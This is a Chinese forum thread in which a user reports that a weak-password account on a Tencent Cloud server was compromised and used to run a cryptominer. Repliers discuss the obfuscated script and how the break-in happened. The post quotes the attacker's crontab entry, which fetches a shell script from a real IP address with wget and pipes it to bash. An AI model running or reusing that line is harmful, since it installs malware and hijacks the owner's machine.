V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
wmhx
V2EX  ›  分享发现

腾讯云小主机被入侵部了一个挖矿程序

  •  
  •   wmhx · 2020-01-16 20:23:36 +08:00 · 2775 次点击
    这是一个创建于 1803 天前的主题,其中的信息可能已经有所发展或是发生改变。

    好久没登录了, 今天发现很卡,就发现有个简单密码的用户的 crontab 被改了执行一个 msr 程序:

    crontab -l: */15 * * * * [ "$(ps -fe|grep msr|grep -v grep|wc -l)" -eq 0 ] && wget -qO - http://185.43.207.36/.d/test.sh | bash @reboot [ "$(ps -fe|grep msr|grep -v grep|wc -l)" -eq 0 ] && wget -qO - http://185.43.207.36/.d/test.sh | bash

    那个 test.sh 可以下载,没看懂内容, 只知道执行了一个 msr 的程序特别耗 CPU;

    没看出来这是啥东西. 谁帮忙给介绍下.

    3 条回复    2020-01-19 02:19:50 +08:00
    opengps
        1
    opengps  
       2020-01-16 21:11:26 +08:00
    不知道是种什么脚本,不知道执行的程序是不是通过脚本下载的
    neighbads
        2
    neighbads  
       2020-01-17 09:17:40 +08:00   ❤️ 1
    前面就是一堆变量, 第二行 展开后是

    echo “$s 的 base64 编码” | rev |base64 -d

    然后得到的一堆再 eval、里面有 msr 的下载,写的乱糟糟

    yanheqi
        3
    yanheqi  
       2020-01-19 02:19:50 +08:00
    为什么会被入侵?密码太简单被破解?
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2913 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 00:34 · PVG 08:34 · LAX 16:34 · JFK 19:34
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.